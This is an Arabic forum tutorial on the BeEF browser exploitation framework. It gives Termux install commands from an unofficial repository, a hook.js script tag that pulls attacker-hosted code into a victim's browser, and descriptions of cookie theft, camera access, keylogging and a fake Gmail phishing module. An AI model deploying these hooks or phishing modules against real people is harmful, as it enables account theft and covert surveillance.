أداة BeEF لاختراق المتصفحات واختبار XSS

x32x01
  • بواسطة x32x01 ||
مع زيادة الهجمات اللي بتيجي من الويب مباشرة على المستخدمين 📱💻، أداة BeEF بقت من أقوى الأدوات اللي أي Pentester لازم يفهمها كويس.
الأداة دي بتخلّيك تختبر الأمان الحقيقي للبيئة المستهدفة من زاوية مختلفة جدًا: متصفح الويب نفسه 🌐.

BeEF بتشتغل على فكرة إن المتصفح هو أضعف حلقة، حتى لو النظام نفسه متأمّن 🔓.

🧠 ليه المتصفح سطح هجوم خطير؟​

الناس بتستخدم المتصفح في كل حاجة تقريبًا:
  • حسابات بنكية 💳
  • إيميلات 📧
  • سوشيال ميديا 📱
  • بيانات شخصية 😬
وده بيخلّي المتصفح هدف مثالي لأي مهاجم، لأن الضحية غالبًا:
  • مش حاسس إنه اتصاب
  • بيدخل بياناته بنفسه
  • وبيسمح بإذونات من غير تركيز


⚙️ إيه هي أداة BeEF بالظبط؟​

BeEF (Browser Exploitation Framework) هو إطار هجوم متخصص في اختراق متصفحات الويب.
بعكس أدوات تانية بتركّز على السيرفر أو الشبكة، BeEF بتدخل من باب مفتوح: المتصفح 🧨.
📌 ممكن كمان تستخدم BeEF مع Metasploit علشان سيناريوهات هجوم أعقد.

🧑‍💻 مين اللي طور BeEF؟​

الأداة اتطورت على إيد فريق مطورين بقيادة Wade Alcorn، ومبنية باستخدام Ruby on Rails.
وهي ممتازة جدًا في:
  • اختبار ثغرات XSS 🔥
  • هجمات الحقن (Injection)
  • الهندسة الاجتماعية 🎭

🎯 BeEF بتعمل إيه مع الضحية؟​

بعد ما تربط متصفح الضحية:
  • 📸 تفتح الكاميرا
  • ⌨️ تراقب ضغطات الكيبورد
  • 🍪 تجمع الكوكيز
  • 🌍 تمسح الشبكة الداخلية
  • 🎣 تشغّل صفحات تصيّد احترافية
وكل ده من جوه المتصفح نفسه 😈.

📲 تثبيت BeEF على Termux​

🔄 تحديث apt​

Code: 
apt update

⚙️ إضافة source الخاص بالتثبيت​

Code: 
mkdir -p $PREFIX/etc/apt/sources.list.d
printf "deb https://hax4us.github.io/TermuxBlack/ termuxblack main" > $PREFIX/etc/apt/sources.list.d/termuxblack.list

🔐 إضافة شهادة المصدر​

Code: 
apt install -y gpg
wget -q https://hax4us.github.io/TermuxBlack/termuxblack.key -O termuxblack.key
apt-key add termuxblack.key

🔄 تحديث السورس​

Code: 
apt-get update -yq --silent

⬇️ تثبيت BeEF​

Code: 
apt install -y beef-xss
📌 سيب الإنترنت شغال لحد ما التثبيت يخلص.

▶️ تشغيل BeEF​

Code: 
beef
هتظهرلك رسالة تطلب منك تغيّر الباسورد الافتراضي 🔑.

واجهة التحكم:
Code: 
http://127.0.0.1:3000/ui/panel
Hook المستخدم لربط المتصفح:
Code: 
<script src="http://<IP>:3000/hook.js"></script>

🔗 ربط متصفح الهدف (Hook)​

مفتاح النجاح في BeEF هو إنك تخلّي الضحية تزور صفحة فيها hook.js.
للتجربة المحلية:
Code: 
http://127.0.0.1:3000/demos/basic.html
بمجرد ما المتصفح يتربط، هيظهر عندك في قائمة Hooked Browsers 🧲.

🔍 عرض تفاصيل المتصفح​

من تبويب Details تقدر تشوف:
  • نوع المتصفح
  • نظام التشغيل
  • الإضافات
  • WebRTC / WebGL
  • معلومات تقنية كتير جدًا 🧠

💣 تنفيذ الأوامر داخل المتصفح​

BeEF فيها أكتر من 300 Module 🔥، منهم:
  • 📜 معرفة المواقع اللي اتزارت
  • 📷 تشغيل الكاميرا
  • 🍪 سرقة الكوكيز
  • 🎣 Google Phishing
  • 🖼️ Screenshot

🎭 مثال: Google Phishing​

بعد تنفيذ الموديول:
  • الضحية يشوف صفحة Gmail مزيفة
  • يدخل الإيميل والباسورد
  • البيانات تتسجل عندك
  • ويتحوّل لموقع Google الحقيقي 😈

⚠️ الخلاصة والتحذير​

BeEF أداة قوية وخطيرة جدًا 💥
وهي مثال حي ليه:
  • ما تضغطش على لينكات مش موثوقة
  • ما تديش إذن للكاميرا أو المايك بسهولة
  • خلي بالك من أي صفحة تسجيل دخول مش طبيعية
الأداة ممتازة للتعلّم والـ Ethical Hacking فقط ✅.
 
التعديل الأخير:
المواضيع ذات الصلة
x32x01
Termux للمبتدئين: اطّلع وابدأ صح على الموبايل
  • x32x01
الردود
0
المشاهدات
867
x32x01
x32x01
x32x01
شرح أداة MBF لهجوم التخمين
  • x32x01
الردود
0
المشاهدات
989
x32x01
x32x01
x32x01
أوامر Termux الأساسية: قائمة سريعة للمبتدئين!
  • x32x01
الردود
0
المشاهدات
2K
x32x01
x32x01
x32x01
الأداة RouterSploit بيئة متكاملة لأختراق الراوتر
  • x32x01
الردود
0
المشاهدات
1K
x32x01
x32x01
x32x01
أداة Wifite لاختبار اختراق شبكات الواي فاي
  • x32x01
الردود
0
المشاهدات
1K
x32x01
x32x01
الدخول أو التسجيل السريع
نسيت كلمة مرورك؟
آخر المشاركات
أحدث المنتجات
إحصائيات المنتدى
المواضيع
2,300
المشاركات
2,511
أعضاء أكتب كود
554
أخر عضو
عبدالله
عودة
أعلى